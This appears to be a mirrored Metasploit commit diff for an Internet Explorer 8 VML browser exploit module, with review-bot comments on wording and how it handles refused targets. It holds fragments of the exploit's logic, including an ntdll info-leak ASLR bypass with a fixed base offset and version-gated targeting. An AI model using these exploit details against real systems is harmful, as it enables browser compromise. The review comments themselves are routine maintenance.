mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Change description a bit

This commit is contained in:
sinn3r 2015-01-27 12:14:55 -06:00
parent 2dedaee9ca
commit bb9c961847


@ -10,17 +10,6 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::RopDb include Msf::Exploit::RopDb
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :ua_name => HttpClients::IE,
# :ua_minver => "8.0",
# :ua_maxver => "8.0",
# :javascript => true,
# :os_name => OperatingSystems::Match::WINDOWS,
# :rank => Rank
#})
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
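Review bot: dropping the commented-out BrowserAutopwn include and the commented-out autopwn_info block is the right cleanup for this hunk; commented-out registration code is dead weight that silently drifts from the module's real requirements (IE 8 only, a specific ntdll build or JRE6). If BrowserAutopwn support is wanted later it should come back as live code that reflects those requirements, not as a comment that can be un-commented without re-checking them.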
@ -30,15 +19,18 @@ class Metasploit3 < Msf::Exploit::Remote
The vulnerability exists in the handling of the dashstyle.array length for vml The vulnerability exists in the handling of the dashstyle.array length for vml
shapes on the vgx.dll module. shapes on the vgx.dll module.
This module has been built and tested specifically against Windows 7 SP1 with The exploit has been built and tested specifically against Windows 7 SP1 with
Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to
bypass ASLR, and by default the info leak is used. The ntdll version should be bypass ASLR, and by default the info leak is used. To make sure the leak is
either v6.1.7601.17514 (the default dll version on a newly installed/unpatched successful, the ntdll version should be either v6.1.7601.17514 (the default dll
Windows 7 SP1), or ntdll.dll v6.1.7601.17725 (installed after apply MS12-001). version on a newly installed/unpatched Windows 7 SP1), or ntdll.dll v6.1.7601.17725
(installed after apply MS12-001). If the target doesn't have the version the exploit
wants, it will refuse to attack by sending a fake 404 message (webpage not found).
If you wish to try the JRE6 component instead to bypass ASLR, you can set the If you wish to try the JRE6 component instead to bypass ASLR, you can set the
advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't
have this particular component, the exploit will refuse the attack. have this particular component, the exploit will also refuse to attack by
sending a 404 message.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
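Review bot: the reworded description still carries the grammatical slip "installed after apply MS12-001" on the line listing ntdll.dll v6.1.7601.17725; it should read "installed after applying MS12-001". The new text also describes the refusal two different ways ("sending a fake 404 message (webpage not found)" for the ntdll path and "sending a 404 message" for the JRE6 path); one phrasing, e.g. "responds with a 404 (Not Found) and does not attempt the exploit", used in both sentences would make it clear that both requirement failures behave identically. Otherwise the description is an improvement: it now states up front that the ntdll version check gates the attack, which is exactly the operator-facing behaviour the code below implements.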
@ -389,6 +381,7 @@ function exploit(){
rescue RuntimeError => e rescue RuntimeError => e
# This one is just a warning, because it's a requirement check so it's not that scary. # This one is just a warning, because it's a requirement check so it's not that scary.
print_warning(e.message) print_warning(e.message)
send_not_found(cli)
return return
end end
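Review bot: adding send_not_found(cli) before the return in the rescue branch is the right fix, since previously the handler returned after print_warning without responding to the client at all, leaving the requirement failure invisible from the browser side and inconsistent with the description's promise of a 404. The comment directly above, "This one is just a warning, because it's a requirement check so it's not that scary.", now under-describes the branch: it should also say that the client is turned away with a 404, e.g. "Requirement check failed: warn the operator and send the client a 404 so nothing is attempted."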
@ -421,7 +414,7 @@ function exploit(){
@ntdll_version = "6.1.7601.17725" # MS12-001 @ntdll_version = "6.1.7601.17725" # MS12-001
@ntdll_base = leak - 0x47090 @ntdll_base = leak - 0x47090
else else
print_error("ntdll version not detected, sending 404: #{agent}") print_warning("ntdll version not detected, sending 404: #{agent}")
send_not_found(cli) send_not_found(cli)
return return
end end
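Review bot: switching print_error to print_warning on the "ntdll version not detected, sending 404" line makes this branch consistent with the rescue branch above, which already treats a failed requirement check as a warning rather than an error, so the change is correct. The two branches now duplicate the same three-line pattern (print_warning, send_not_found(cli), return); folding that into one small helper such as a refuse_with_404(cli, reason) method would keep the two failure paths from drifting apart again, as the error/warning level just did.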